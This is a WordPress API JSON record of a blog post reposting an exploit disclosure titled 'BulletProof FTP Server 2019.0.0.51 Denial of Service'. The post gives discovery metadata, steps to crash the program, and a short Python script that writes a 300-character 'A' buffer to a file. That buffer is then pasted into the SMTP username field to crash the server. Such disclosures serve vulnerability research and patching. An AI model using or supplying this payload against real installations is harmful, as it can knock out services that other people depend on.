{"id":40010,"date":"2023-04-06T21:00:56","date_gmt":"2023-04-06T17:00:56","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/171753\/BulletProof_FTP_Server_2019.0.0.51.py.txt"},"modified":"2023-04-10T13:15:11","modified_gmt":"2023-04-10T08:45:11","slug":"bulletproof-ftp-server-2019-0-0-51-denial-of-service","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/bulletproof-ftp-server-2019-0-0-51-denial-of-service\/","title":{"rendered":"BulletProof FTP Server 2019.0.0.51 Denial Of Service"},"content":{"rendered":"
#Exploit Title: BulletProof FTP Server 2019.0.0.51 - Denial of Service\r\n#Discovery by: Yehia Elghaly - Mrvar0x\r\n#Discovery Date: 2023-03-31\r\n#Vendor Homepage: https:\/\/barcodemagic.com\/\r\n#Software Link: http:\/\/bpftpserver.com\/products\/bpftpserver\/windows\/download\r\n#Tested Version: 2019.0.0.51\r\n#Tested on: Windows 7 x86<\/code><\/pre>\n
#Steps To Crash:
\n#Run: BulletProof_FTP_Server_2019.0.0.51.py
\n#Open poc.txt and copy content to clipboard
\n#Open BulletProof FTP Server – Select “Settings” > “SMTP”
\n#”Email Server” select “Username” and Paste Clipboard
\n#Click on “Test” —–> Crashed<\/p>\n
<\/code><\/pre>\n
buffer = “A” * 300
\npayload = buffer
\ntry:
\nf=open(“Poc.txt”,”w”)
\nprint “[+] Creating %s evil payload..” %len(payload)
\nf.write(payload)
\nf.close()
\nprint “[+] File created!”
\nexcept:
\nprint “File cannot be created”<\/p>\n
<\/code><\/pre>\n
 <\/p>\n
<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"
#Exploit Title: BulletProof FTP Server 2019.0.0.51 – Denial of Service #Discovery by: Yehia Elghaly – Mrvar0x #Discovery Date: 2023-03-31 #Vendor Homepage: https:\/\/barcodemagic.com\/ #Software Link: http:\/\/bpftpserver.com\/products\/bpftpserver\/windows\/download #Tested Version: 2019.0.0.51 #Tested on: Windows 7 x86 #Steps To Crash: #Run: BulletProof_FTP_Server_2019.0.0.51.py #Open poc.txt and copy content to clipboard #Open BulletProof FTP Server – Select “Settings” > “SMTP” #”Email …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-40010","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/40010","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=40010"}],"version-history":[{"count":1,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/40010\/revisions"}],"predecessor-version":[{"id":40157,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/40010\/revisions\/40157"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=40010"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=40010"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=40010"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}